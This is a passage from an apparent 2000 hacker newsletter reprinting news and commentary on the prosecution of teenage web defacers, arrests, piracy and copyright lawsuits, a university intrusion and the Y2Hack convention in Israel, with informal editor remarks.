thinking you'll never die, and that you'll never get caught.
According to news reports, Coolio will be charged as an adult with
"unlawfully accessing a computer or otherwise disrupting computer
operations that results in more than $1,000 in harm." (D.A.R.E., a
not-for-profit organization, claims it lost $18,000 -- from the potential
donations that might have flooded in to the site had it not been in its
altered state.)
If convicted (as an adult), the kid could face 5 to 15 years in prison and
a maximum fine of $4,000 -- for one Website defacement. He has, however,
admitted to three, and that would earn him a potential total of 45 years in
jail. But he got D.A.R.E. twice -- so that could bring the number of years
to 60.
You know, I just don't think adolescent pranks usually carry these kinds of
consequences in the real world.
Tough on crime Reno's Department of Justice report mentions the need to
teach kids in schools about ethical computer use. The department plans to
use a cartoon character similar to MacGruff the Crime Dog to ensure the
friendliness of the message. Something tells me they're targeting the wrong
demographic here.
The report also suggests that courts not be required to sentence all
computer intruders to what is now a mandatory six-month jail term for
unauthorized access to systems. (Note that the use of the word systems is
pretty vague here, as, for that matter, is the use of the term unauthorized
access.)
The motivation for the sentence reduction is not mercy. It is the opposite.
The attorney general's report explains: "In some instances, prosecutors
have exercised their discretion and elected not to charge some defendants
whose actions otherwise would qualify them for prosecution under that
section, knowing that the result would be mandatory imprisonment."
The Justice Department wants more convictions, and it is willing to waive
mandatory sentencing to get them. Imagine how conviction rate statistics
for computer crime might jump from 1999 to 2000 if the department's request
is granted.
Reno's report continues: "Computer hacking 'for fun' is a very serious
problem not only for the targets of the attacks but also for law
enforcement personnel who often have no way to determine the motivation for
and the identity of the person behind the intrusion."
That bothers me. Our laws permit us to determine motivation for crimes such
as murder in the first degree versus manslaughter -- or the difference
between loitering and loitering with intent. I guess it's the purview of
the court -- and not law enforcement -- to determine the motivation, just
as it's allegedly in the purview of the court -- and not the legislature --
to determine sentencing. But if motivation is considered to be important in
murder and in loitering, why isn't it considered to be important in
computer intrusions?
Too much free speech In Coolio's case at least, the messages that he
allegedly left on each of the Webpages might serve as our first clue to his
motivation. You can see all of them at the attrition.org mirror site (see
Resources for URL).
The RSA defacement was a parody of the firm's regular front page -- it was
even pretty funny. At D.A.R.E., he twice replaced their regular home page
with (pretty lame) "pro-drug" messages. But the last line in the text to
his CWC defacement made me laugh out loud. The entire text reads:
PEACE THROUGH POWER ONE VISION ONE PURPOSE
<starrrr> muhaha I did steal head server of Internet. If push "power"
button the hole net will be shutdown. I hate all you Quake Playas!!
!!uu!! And if push reset button the whole Internet going to DIE
Praise Allah and also Coolio for making this all possible!
If prayers do not become mandatory throughout the United States, we
will detonate our nuclear bombs and your President Clinton and his
interns will die.
One more thing, there is too much free speech on the internet, we want
you to try to do something about it. Thanks.
This CWC message was described by the Secret Service and reported by MSNBC
as a death threat to the president.
I respect the fact that law enforcement needs to treat death threats
seriously. I also respect the fact that security personnel -- in law
enforcement as in computer security -- are paid to be paranoid. But I do
think that calling Coolio's text "a death threat to the President" is
stretching it a bit. Dare I suggest that the D.A.R.E. site's damage
estimates are also exaggerated?
I wonder how they would estimate damages and determine the motivation for
an incident in which somebody's domicile was toilet-papered? After all, the
act involves trespassing, doesn't it? It sounds like a pretty serious
breach of security to me, and it could happen to anyone. After all, the
streets are totally unregulated. Perhaps scariest of all is the fact that
if it happened to me, I would never, ever be able to trace the perpetrator
who originated the attack back to his house. Somebody declare a state of
emergency, quick!
Is your refrigerator running? If instead of defacing its Website, Coolio
had made prank phone calls to D.A.R.E., would those calls count as
unauthorized access to systems? Would the Feds be calling for the power to
install phone taps on all of the nation's phones to catch him? Would they
spend thousands of dollars in taxpayer money to crisscross the entire
country in search of him and then threaten him with 5 to 15 years in jail?
Would he have been portrayed as a guilty-until-proven-innocent hoodlum in
the media?
Not all "computer crimes" are equivalent to one another. Merely poking
around a system is different from defacing a Website -- which is different
from stealing passwords, which is different from stealing credit card
numbers, which is different from actually using those credit card numbers.
If you don't know what I mean by that, then G. William Troxler's essay
about different types of hacking (see Resources) might be a good starting
point towards understanding some different motivations for "unauthorized
access to systems."
I guess law enforcement is asking for such tough sanctions against kids
(felony vandalism, indeed) in the attempt to "scare them straight" and
teach them to "respect the law." It's OK to try to do that. But it is not
OK to do that with inhumane and inappropriate punishments that do not fit
the crime.
That area of law is dangerously broken. If you don't believe me, go read
Robert W.F. Clark's account of being arrested for computer crime ("My Bust
or An Odyssey of Ignorance"), the story of Bernie S, and Brian Martin's
essays (see Resources). I'm sure that Coolio didn't think that he would be
caught. I'm equally sure that prosecutors won't be interested in his
motivation or in investigating what he really did.
How soon will it be before young Americans -- of both sexes, this time --
begin to run away from the United States to seek sanctuary in Canada again?
I guess we should be glad that at least one North American country appears
to be relatively sane. But I wish that the one I live in right now was,
too.
The real world I am not trying to say that everyone who has breached
security is a kid. Nor am I saying that everyone who has breached security
is harmless. A great deal of harm can be done -- and probably is being
done, even as you read this -- by people of real malice, perhaps people
such as the PhoneMasters (see Resources).
Criminals should be caught, and they should be punished. But those who
violate privacy, embezzle money, and steal credit card numbers don't go
around drawing attention to themselves by defacing Webpages. Besides, we
already have other laws which can be used to punish people who embezzle
money or commit credit card fraud.
But I think that Coolio should be punished, too. Being grounded (without
the use of his computer) for two weeks might be adequate. Taking the cough
syrup into account, let's make it a month.
With Janet Reno's report, law enforcement is asking for more money to fight
the looming specter of cybercrime. I'd love to know exactly how much money
has been spent to track down this kid from New Hampshire. If law
enforcement continues to dispense money willy-nilly to track adolescent
pranksters, they will never have enough time, money, or personnel -- no
matter how many times we increase their budget -- to recognize and go after
the real criminals -- like the ones that the government predicts will only
make their presence known once they are prepared to strike. Yeah, like, I
remember the last time that happened, when Dr No hijacked those nuclear
warheads off the coast of Cape Canaveral. It was really terrifying to have
the whole world held hostage by a supercriminal like that. Perhaps Ms Reno
et all need to spend a bit more time on the Internet, and a bit less time
watching reruns on TV.
@HWA
142.0 HNN:Mar 29th:@tlanta Con to be Held this Weekend
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by fuller212
@tlanta con is a hacking/phreaking convention hosted by the South
Eastern 2600 groups in Atlanta Georgia. It was created due to demand
of another hacking convention in the South Eastern US. @tlanta Con
will be held this Friday, Saturday and Sunday at the The Ramada Inn
and Conference Center in Midtown Atlanta.
Atlanta Con
http://www.atlantacon.org/
----------
@HWA
143.0 HNN:Mar 30th:MostHateD Busted for Burglary and Theft
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Knack
MostHateD (Patrick W. Gregory) was arrested on Tuesday and is being
held in Harris County Jail in Texas charges of burglary and car theft.
This arrest prevented him from appearing in federal court on Wednesday
to plead guilty to defacing the White House web page. It is unclear
hat the status of his federal charges are at this time.
Houston Chronicle
http://www.chron.com/cs/CDA/story.hts/metropolitan/507263
----------
March 29, 2000, 10:07PM
Computer hacker, 19, held on charges of burglary and car theft
A computer hacker charged with breaking into White House, Army and Senate
computers is being held in Harris County Jail on unrelated charges of
burglary and car theft.
Patrick W. Gregory, 19, who lives in east Harris County, had been scheduled
to appear in federal court Wednesday to plead guilty to damaging computers
and trafficking in unauthorized personal identification numbers. His
Tuesday arrest prevented that.
"What we have him for is fairly unspectacular," said sheriff's Capt. Don
McWilliams. "These are not related to his prior federal cases. What we have
him for is not related to that at all."
He was arrested after the sheriff's Burglary Response Squad found enough
evidence to charge him with burglary and unauthorized use of a vehicle. No
details on that case were available.
Only after arresting him did sheriff's investigators discover that Gregory
was due to appear in federal court on the hacking charge.
"What happens now with his federal situation, I couldn't say," McWilliams
said.
During his days as a high-profile, high-tech bandit, Gregory called himself
"MostHateD" and headed a computer gang dubbed "globalHell," according to a
plea agreement he signed earlier this month.
The hacker group drew attention last May when it succeeded in getting into
the White House Web site. That gang also is accused of vandalizing Army and
Senate computers.
Prosecutors accuse the group of illegally accessing teleconference services
from AT&T, MCI and Sprint. Gregory was one of four Houston-area teens
arrested.
Gregory told the Houston Chronicle last June that globalHell numbered as
many as 20 people, including a handful of international members, primarily
in Europe. Most were youngsters trying to make a name for themselves
through Web-hacking, he said.
Gregory's hard drive, seized by government agents who raided his house,
revealed he was adept at ducking in and out of varied databases, including
the state of West Virginia's main Web page, the Philippines Bureau of
Internal Revenue, the British Computer Society, the American Retirement
Corp. and the government of Burundi.
@HWA
144.0 HNN:Mar 30th:Miramax Sued for Fugitive Game
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
The Miramax division of The Walt Disney Company has been sued for
allegedly steal the story line of the 'The Fugitive Game' without the
authors permission. 'The Fugitive Game' by Jonathan Littman details
the arrest and capture of Kevin Mitnick. The Disney/Miramax/Dimension
Films production of the movie Takedown premiered earlier this month in
29 theaters in Paris, France. The suit alleges that the movie is based
in large part on Littman's book.
Business Wire - via Northern Light
http://library.northernlight.com/FB20000329240000273.html?cb
----------
Disney and Miramax Sued for 'Hacking'; Parts of 'The Fugitive Game'
Allegedly Stolen For New Movie
Story Filed: Wednesday, March 29, 2000 8:18 AM EST
SAN FRANCISCO, Mar 29, 2000 (BUSINESS WIRE) -- The Walt Disney Company and
its Miramax division have made a computer hacker movie that "hacked" the
author's book without paying or giving credit to the writer, according to
a lawsuit filed yesterday by Bartko, Zankel, Tarrant & Miller, a law
firm representing best-selling author Jonathan Littman.
Littman's suit alleges that the Disney/Miramax/Dimension Films production
of the movie Takedown, which premiered earlier this month in 29 theatres
in Paris, France, was based in large part on lifted segments of Littman's
book, The Fugitive Game. Littman's book, published in 1996, is based
on the celebrated capture of computer hacker Kevin Mitnick, who was billed
at the time as the world's most notorious and dangerous "cyberterrorist."
"Jonathan Littman carefully researched the reality of the computer hacker
underworld," said his lawyer Bill Edlund. "His book articulated and
supported his view that Kevin Mitnick was not the premeditated, greedy and
destructive criminal portrayed by some of the media. Readers and
critics received Littman's The Fugitive Game as a more in-depth
presentation and entertaining expose of the flawed Mitnick prosecution
than the overblown, self-interested media hype."
The Fugitive Game shows Mitnick to be not a terrorist, but a computer
hacker, in part a misguided victim of a government entrapment effort that
used a sleazy informant to lure Mitnick into hacking. A key element of
Littman's book is his examination of the media hype spurred in New
York Times articles by reporter John Markoff about the Mitnick story.
Littman also questions Markoff's presentation of Tsutomu Shimomura, a
computer security specialist who used hacking techniques similar to
Mitnick's to trace Mitnick to his hideout in North Carolina.
Shimomura and Markoff wrote their version of these events in their book
Takedown, released at the same time as Littman's book. The book is based
on the seven-week pursuit of Mitnick by Shimomura that led to Mitnick's
arrest in February of 1995. The Disney organization purchased the
book and movie rights to Takedown and have now released their movie
version, hiring a cast that included lead actor Skeet Ulrich and
screenwriters led by John Danza.
"The screenwriter could not shape the story told in the book Takedown into
a workable script," said Edlund. "Once the movie project began to
flounder, Danza and other screenwriters lifted most of the first part of
Littman's The Fugitive Game for the storyline and start of the movie
Takedown. Littman's lawsuit is backed by e-mails allegedly sent by Danza.
In the e-mails, the screenwriter admits that it was 'unfortunate' that
Disney did not option the rights to the book The Fugitive Game to make the
movie Takedown. Danza goes on to describe his desire to use Littman's
insider information and parts of Littman's book in order to try and
salvage the movie project."
The complaint presents a detailed comparison between Littman's book and
the final shooting script for the movie Takedown, allegedly illustrating
repeated and compelling similarities between the two. According to the
allegations, the film Takedown and The Fugitive Game both open with
a scene in a strip club frequented by a government informer who reveals to
Mitnick information about "SAS" -- a secret Pacific Bell phone-tapping
system that Mitnick subsequently breaks into and uses.
Littman's lawsuit also contends that various themes and interpretations
from his book that are absent from the book Takedown appear in the movie
version of Takedown, including the government informer and entrapment of
Mitnick, and the pressure on the government to capture Mitnick
created by exaggerated media hype.
Littman seeks to prevent Disney, Miramax and the other defendants from
continuing to violate his copyrights by distributing the movie and to
recover his damages and the wrongful profits that defendants obtained from
the alleged theft of his work. Littman's lawyers say that the
Disney-Miramax plagiarism tainted Littman's work by patching it into their
motion picture.
Because of this, he is also asking for damages that he claims resulted
from opportunities he lost, including the opportunity for involvement with
other movie projects based on The Fugitive Game.
Distributed via COMTEX.
Copyright (C) 2000 Business Wire. All rights reserved.
CONTACT: Bartko, Zankel, Tarrant & Miller William I. Edlund, 415/291-4579
KEYWORD: CALIFORNIA INTERNATIONAL EUROPE INDUSTRY KEYWORD: MOTION PICTURES
SOFTWARE ENTERTAINMENT PUBLISHING LEGAL/LAW Today's News On The Net -
Business Wire's full file on the Internet with Hyperlinks to your home
page. URL: http://www.businesswire.com
Copyright � 2000, Business Wire, all rights reserved.
You may now print or save this document. (cool thanks man)
@HWA
145.0 HNN:Mar 30th:Glassbook Shattered
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Not a lamer
Within a day after its release the new Stephen King book "Riding the
Bullet" were circulating around the Internet. The first versions where
simply screen shots of the protected PDF file but soon unlocked copies
of the PDF where available. The unprotected PDF file was posted to a
web site in Sweden and shortly thereafter a detailed explanation of
the attack was posted to Usenet.
eBookNet
ZD Net
Dejanews
http://www.ebooknet.com/story.jsp?id
http://www.zdnet.com/zdnn/stories/news/0,4586,2487101,00.html
http://x37.deja.com/getdoc.xp?AN
----------
@HWA
146.0 HNN:Mar 30th:Yahoo Sued Over Piracy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
Yesterday videogame makers Sega, Nintendo and Electronic Arts filed a
lawsuit in U.S. District Court in San Francisco, against Yahoo. The
suit accuses Yahoo of copyright and trademark infringement, unfair
competition, and offering illegal devices for sale and seeks seeks
compensatory damages of up to $100,000 per copyright violation, and up
to $2,500 for sale of each 'mod chip'.
Industry Standard - via Yahoo
http://dailynews.yahoo.com/h/is/20000329/bs/20000329024.html
----------
Wednesday March 29 03:16 PM EST
Videogame Makers Sue Yahoo Over Piracy
Elinor Abreu
(Industry Standard)
Videogame makers Sega, Nintendo and Electronic Arts have filed a lawsuit
against Yahoo, accusing the portal of ignoring sales of counterfeit
videogames on its auction and mall areas.
The lawsuit, which the manufacturers filed yesterday in U.S. District
Court in San Francisco, accuses Yahoo of copyright and trademark
infringement, unfair competition, and offering illegal devices for sale.
The lawsuit asks the court to order Yahoo to stop the sales. It also
seeks compensatory damages of up to $100,000 per copyright violation, and
up to $2,500 for each sale of the hardware devices - some of which are
called "Mod Chips" - that allow people to circumvent copyright protection,
says Jeff Brown, a spokesman for Redwood City, Calif.-based Electronic
Arts.
Yahoo spokeswoman Diane Hunt offers little comment on the lawsuit. "We're
not aware of specific situations," she says.
The gamemakers claim people are selling the illegal items in Yahoo's
auction area, and in the shopping area that Yahoo leases to outside
merchants. "They are openly sold and labeled" with phrases like 'back up
copy,' 'compilation disk' and 'never published,' according to Brown.
"It's very widespread and blatant."
Electronic Arts sent two letters about the matter to Yahoo's general
counsel last summer. It followed the letters with phone calls, Brown says
- all of which were ignored. At an industry meeting with Yahoo
representatives in December 1999, the company seemed unconcerned, he
adds.
"Yahoo's position was that they either didn't care or didn't feel the need
to address the problem," Brown says. "That is essentially what's forced us
to find a legal solution."
Electronic Arts says the problem crops up on other Web sites, but that the
owners of those sites are either in discussions with Electronic Arts or
have taken steps to resolve the problem.
The company doesn't know the extent of its losses to online piracy, but it
notes that a study by the Interactive Digital Software Association pegged
worldwide losses from Net piracy and counterfeiting at $3.2 billion. The
issue of piracy looms large for makers of computer software. That's
particularly true overseas, where enforcement can be lax and prices high.
Within the U.S., makers of music CDs are battling with companies that
offer ways to distribute digital music online.
Representatives from Nintendo and Sega, the top two gamemakers in the U.S.
after Electronic Arts, were not immediately available for comment.
MP3 Sends Music Industry Back to School
http://www.thestandard.com/article/display/0,1151,12393,00.html
Copyright Case Streaming to Court
http://www.thestandard.com/article/display/0,1151,8505,00.html
Judge Halts DVD Encryption Hackers
http://www.thestandard.com/article/display/0,1151,9063,00.html
@HWA
147.0 HNN:Mar 30th:Italian University Attacked by Brazilian Intruders
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Computers at Como's Insubria University in northern Italy have been
compromised by intruders based in Brazil according to police. The
Department of Physical Sciences and Mathematics suffered intrusions on
130 different systems according to authorities. Technicians are
working on tightening security on the network.
EFE - via Northern Light
http://library.northernlight.com/FA20000330540000296.html?cb
----------
BRAZILIAN HACKERS BREAK INTO COMO UNIVERSITY COMPUTER NETWORK
Story Filed: Thursday, March 30, 2000 2:41 AM EST
Rome, Mar 01, 2000 (EFE via COMTEX) -- Brazilian hackers broke into the
computer system at Como's Insubria University in northern Italy, police
said Wednesday, after university officials reported the incident.
The break-in affected 130 computers used by professors, researchers,
students and administrative personnel in the Department of Physical
Sciences and Mathematics.
Technicians have isolated the site from the rest of the university's data
transmission network while they continue to work on eliminating the
Brazilian virus.
Italian technicians said the hackers were able to break the security code
and gain access to the network, and used several computers to take control
of the e-mail system.
Even though an early check of the network revealed that damages to the
system are not substantial, departmental activity has been at a total
standstill for more than three days. EFE
mr/dd/vc
Copyright (c) 2000. Agencia EFE S.A.
(holy crap now thats one ACE killer article! and they get paid? wow - Ed)
@HWA
148.0 HNN:Mar 30th:E-commerce Site Accuses Other of Intrusions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
An e-commerce sites in China has accused another site of intruding
into its systems several times over the last few months. Leaders at
www 8848.net have denied the charges. The case has been referred to
Beijing's Dongcheng District Public Security Sub-bureau for possible
prosecution.
Xinhua - via Northern Lights
http://library.northernlight.com/FC20000327510000102.html?cb
----------
E-Commerce Companies Quarreling on Hacker Issues
Story Filed: Monday, March 27, 2000 8:26 PM EST
BEIJING (March 28) XINHUA - Several Beijing-based Electronic commerce
companies are quarreling with each other on hacker issues recently.
Sources with www.dangdang.com claim that its online bookstore has been
hacked repeatedly this month. The sources said it believed that the
hacker's Internet Protocol (IP) address was from another online shopping
website, www 8848.net. An online discount store, www.123.com, also
said that hacker from 8848 had invaded its website, said today's China
Daily.
Dangdang, who said the hacking had caused "serious economic losses, "has
reported the case to Beijing's Dongcheng District Public Security
Sub-bureau and has employed an attorney for possible investigation.
However, the 8848 company denied the accusation and its CEO, Wang Juntao,
confirmed that no person from his company had been involved in the
behavior.
Wang said that technically an IP address is very easy to imitate. He also
indicated that some online shopping companies may hype the hacker issue.
The 8848 net is the biggest domestic online shopping site and Dangdang
claims it is the leading domestic online bookstore.
Wang said that dot com companies should adopt more responsible attitudes
on hacker issues, and should pay more attention to strengthening their
network security than accusing competitors.
The Dongcheng District police authority is cautious about the case. But an
official said that there are still no reports on their investigation.
A poll from a local company showed that more than half of its interviewees
who have not shopped on-line said they will not try this kind of shopping
in the next three months.
Copyright � 2000, Xinhua News Agency, all rights reserved.
(Suck don't they? geez - Ed)
@HWA
149.0 HNN:Mar 30th:Australia To Protect Privacy of Works
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Australia's Privacy Commissioner has published Guidelines on Workplace
E-mail, Web Browsing and Privacy, in an effort to protect the privacy
of workers as they use corporate computer systems. The guidelines are
expected to expected to be introduced in parliament within the next
two weeks.
AsiaPulse - via Northern Light
http://library.northernlight.com/FA20000330910000165.html?cb
----------
Who cares.
@HWA
150.0 HNN:Mar 31st:Y2Hack Goes on in Israel
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by tutlex
Over 350 people attended the hacker convention held in Israel last
Wednesday and Thursday. Local officials tried to shut the conference
down but eventually relented and allowed the convention. Participants
played 'Spot the Fed' (I thought that was a Defcon thing?) and
participated in a conference call with Kevin Mitnick.
Associated Press - via Yahoo
USA Today
Y2Hack
http://dailynews.yahoo.com/h/ap/20000330/tc/israel_hacker_conference_1.html
http://www.usatoday.com/life/cyber/tech/cth643.htm
http://www.y2hack.com
----------
Yahoo;
Thursday March 30 1:58 PM ET
Hackers Hold Convention in Israel
By LAURIE COPANS, Associated Press Writer
JERUSALEM (AP) - Hackers from around the world overcame interrogations,
censorship and an all-around bad image to hold Israel's first hacker
convention, wrapping up the two-day conference Thursday without a glitch.
The 350-strong gathering was the first of its kind since the Yahoo! and
e-Bay commercial sites were crippled in February, reminding companies
across the globe of the dangers hackers can pose.
At the request of lawmakers, Israeli police had considered banning the
conference, but Attorney General Eliyakim Rubinstein gave the go-ahead.
One of the original hackers, John Draper of
Fremont, Calif., said the hackers wanted to put a
better face on the practice.
``A hacker is a person who is developing programs
to make them better,'' Draper told The Associated
Press. ``They aren't the kind of people who break
into computer systems. That's a cracker.''
Draper, known by the handle ``Captain Crunch,''
helped launch the hacker phenomenon. In 1971, he
discovered that a toy whistle from a cereal box
reproduced the tone needed to open a free
telephone line.
Aware of his fame, Israeli security agents at the
Los Angeles airport interrogated Draper for an
hour, he said, and thoroughly searched his
computer equipment before allowing him on the
plane.
``There were many attempts to silence us on this,'' organizers said in a
summary of the gathering, released on their Web site.
Police prevented the organizers from publishing one of the results of the
conference: a list of vulnerable Israeli commercial Web sites.
To compile the list, participants played ``HackTheseSites'' with sites
offered up by Israeli companies. The site owners were confident no one
could thwart them, but they were wrong.
When they weren't eating pizza or guzzling soda, the hackers sat bent
over their computer screens. They discovered that 28 percent of the
Israeli net is vulnerable - about the same proportion as the rest of the
world, according to organizers.
Police were invited to attend the conference and even to speak, but they
turned down the offer, creating the game ``Spot the Fed.''
Participants were given the challenge of finding plainclothes policemen
among them. If a person pointed out as suspicious was in fact a security
official, the official was to get an ``I am the FED'' T-shirt, and the
spotter an ``I spotted the FED'' shirt. But none were found out.
Israeli lawmaker and former Science Minister Michael Eitan accepted an
invitation to attend. He said that hacker games like those displayed at
the conference were meant more to entertain ambitious youngsters than
cause harm.
``I told them that as long as they all enjoy the freedom of the Internet
and don't abuse this freedom, and make the public support police
intervention, this will work,'' Eitan said in a telephone interview.
Participants also got to speak to their guru - convicted cyberbandit
Kevin Mitnick - in a conference call. The 36-year-old American bemoaned
the strict probation terms that ban him from using a computer or any
hi-tech device.
Mitnick was released last year after serving five years in jail for
breaking into the computer systems of some of America's biggest
companies, including Motorola Inc. (NYSE:MOT - news), Novell Inc.
(NasdaqNM:NOVL - news) and Sun Microsystems Inc. (NasdaqNM:SUNW -
news)
``He had a lot of sympathy in the room - we all know not being able to
touch a computer is a worse punishment than even being in jail,'' said
Neora Shaul, a Tel Aviv computer programmer who helped coordinate the
conference.
-
On the Net: Conference organizers at http://www.neora.com
USA Today;
Even hackers have an expo (Writer lives under a rock apparently - Ed)
Hackers gather in Israel, despite govt. resistance
JERUSALEM (AP) - Hackers from around the world overcame
interrogations, censorship and an all-around bad image to hold Israel's first
hacker convention.
The two-day conference
wrapped-up Thursday without a
glitch.
The 350-strong gathering was the
first of its kind since the Yahoo! and
eBay commercial sites were
crippled in February, reminding
companies across the globe of the
dangers hackers can pose.
At the request of lawmakers, Israeli
police had considered banning the conference, but Attorney General Eliyakim
Rubinstein gave the go-ahead.
One of the original hackers, John Draper of Fremont, Calif., said hackers
wanted to put a better face on the practice.
''A hacker is a person who is developing programs to make them better,''
Draper told The Associated Press. ''They aren't the kind of people who break
into computer systems. That's a cracker.''
Draper, known by the handle ''Captain Crunch,'' helped launch the hacker
phenomenon. In 1971, he discovered that a toy whistle from a cereal box
reproduced the tone needed to open a free telephone line.
Aware of his fame, Israeli security agents at the Los Angeles airport
interrogated Draper for an hour, he said, and thoroughly searched his
computer equipment before allowing him on the plane.
''There were many attempts to silence us on this,'' organizers said in a
summary of the gathering, released on their Web site (www.neora.com/).
Police prevented the organizers from publishing one of the results of the
conference: a list of vulnerable Israeli commercial Web sites.
To compile the list, participants played ''Hack These Sites'' with sites offered
up by Israeli companies. The site owners were confident no one could
penetrate them. Many were wrong.
When they weren't eating pizza or guzzling soda, the hackers sat bent over
their computer screens. They discovered that 28% of the Israeli net is
vulnerable - about the same proportion as the rest of the world, according to
organizers.
Police were invited to attend the conference and even to speak, but they
turned down the offer.
Hackers engage in a game of ''Spot the Fed,'' challenging themselves to
identify plainclothes policemen attending the conference. If a person pointed
out as suspicious was in fact a security official, the official was to get an ''I
am the FED'' T-shirt, and the spotter an ''I spotted the FED'' shirt. No
security officials were identified.
Israeli lawmaker and former Science Minister Michael Eitan accepted an
invitation to attend. He said that hacker games like those displayed at the
conference were meant more to entertain ambitious youngsters than cause
harm.
''I told them that as long as they all enjoy the freedom of the Internet and don't
abuse this freedom, and make the public support police intervention, this will
work,'' Eitan said in a telephone interview.
Participants also got to speak to their guru - convicted cyberbandit Kevin
Mitnick - on a conference call. The 36-year-old American bemoaned the
strict probation terms that ban him from using a computer or any hi-tech
device.
Mitnick was released last year after serving five years in jail for breaking into
the computer systems of some of America's biggest companies, including
Motorola Inc., Novell Inc. and Sun Microsystems Inc.
''He had a lot of sympathy in the room - we all know not being able to touch a
computer is a worse punishment than even being in jail,'' said Neora Shaul, a
Tel Aviv computer programmer who helped coordinate the conference.
@HWA
151.0 HNN:Mar 31st:Another Member of Inferno.br Identified in Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by ps
The Internet Crime Sector of the Sao Paulo Police in Brazil has
questioned JxLxMx in connection with attacks on various web sites.
Both JxLxMx and JZ, who was identified last week, will most likely be
prosecuted for damages, crime against the honor of various authorities
and fraudulent use of telecommunication systems, under article 10 of
the law 926/96.
IDG News Brazil - Portuguese
http://www.uol.com.br/idgnow/inet/inet2000-03-30d.shl
----------
@HWA
152.0 HNN:Mar 31st:China Sets Up security Test Center
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
In an effort to test security problems related to hardware, database
systems, application software systems and network equipment and
related systems, The National Information Security Testing Evaluation
and Certification Center has established a new branch, the Computer
Testing Evaluation Center, in Beijing.
AsiaBizTech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID
----------
Error
The Reason:
CID$B$N@_Dj$,4V0c$C$F$$^$9!#%F%s%W%l!<%H$r3NG'$7$F2<$5$(B
nifty huh?
@HWA
153.0 HNN:Mar 31st:Hackers Probe Physical Security of MIT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse
The Massachusetts Institute of Technology, where the word hacker was
coined, is a physical maze of underground steam tunnels and hidden
passageways. Hackers traverse these passageways almost on a nightly
basis looking for new challenges.
The Boston Globe
http://www.boston.com/dailyglobe2/090/metro/_Hackers_skirt_security_in
_late_night_MIT_treks+.shtml
----------
See ISN story
@HWA
154.0 HNN:Mar 31st:DVD for Linux is Now Legal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Brad
It was only a matter of time. After all the bruhaha over DeCSS someone
has finally created a legal DVD player for the Linux platform. LinDVD
has been created and will be marketed by Intervideo for $29.95 and
will be available this spring.
Wired
Intervideo
http://www.wired.com/news/business/0,1367,35311,00.html
http://www.intervideo.com
----------
Legal DVD for Penguin-Heads by Michelle Finley
3:00 a.m. Mar. 31, 2000 PST "Woo-hoo! No more double-boot disks!"
yelled Linux user Joe CapoBianco, in reaction to InterVideo's announcement
that it will soon release a software DVD player/decoder for the Linux
operating system.
Although there is some support for DVD on Linux, some of the open source
operating systems users set up their machines to run both Linux and
Windows in order to watch DVD movies and play games.
The lack of DVD support for Linux has come to the forefront lately,
pushing some developers to come up with solutions that included an
unauthorized DVD decoder for Linux, which resulted in lawsuits filed by
the DVD industry.
InterVideo has a long-standing Content Scrambling System (CSS) license,
enabling it to produce and market DVD player/decoder software without
violating copyright or other laws.
InterVideo sales and marketing head Joe Monastiero says the Linux platform
presents a variety of opportunities for the company to expand its existing
technology base, including DVD software.
"Of notable interest is the set-top environment; however, even the PC
space has enough interest in Linux to make our development worthwhile," he
said. "Additionally, as should be obvious based on the reports generated
by Wired News a few months ago regarding DVD and Linux, the reason
why the CSS hack was done for the Linux community is because traditional
Windows multimedia developers writing Linux code are not exactly
plentiful."
The product, dubbed LinDVD, will allow users to play back DVD movies,
interactive DVD titles, MPEG video content, and Video CDs on PCs that are
equipped with a DVD drive without the need for a hardware decoder card.
The decoder/player includes integrated MPEG1 and MPEG2 file
playback, a powerful VCD 2.0 player, and SVCD playback. A full
multi-channel Dolby Digital (TM) audio decoder will be included.
LinDVD will be available late spring and will be priced at $29.95. If
"someone writes a multichannel audio driver for their Linux sound card,"
Monastiero said, "the multichannel version would be $49.95 and would
support full 5.1 output."
In keeping with the spirit of open source ethics, Monastiero says that
InterVideo is looking at ways to open up as much of the product as
possible to the OS community.
"Certainly, there will be an [application programming interface] published
to create unique user experiences and [user interfaces]," he said. "We are
also looking at ways to help developers port drivers to our code.
"But the CSS, Dolby, and navigation code will definitely not be open
source. We're doing this to add a legal player to the market that the DVD
industry can also be happy with."
"This is another exciting day for the Linux community," said Linus
Torvalds, creator of the Linux operating system. "[Linux] continues to
attract industry-leading software companies like InterVideo. Their digital
video and audio products will greatly enhance the Linux multimedia
experience."
@HWA
155.0 HNN:Mar 31st:Y2K Survivalists Come Out of Hiding
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
Fearing the end of the world, nuclear holocaust, and other terrible
calamities a Japanese man traveled to extremely remote parts of
Australia. He believed the world would be plunged into chaos as it
entered the new millennium. The man traveled to the Willare Bridge
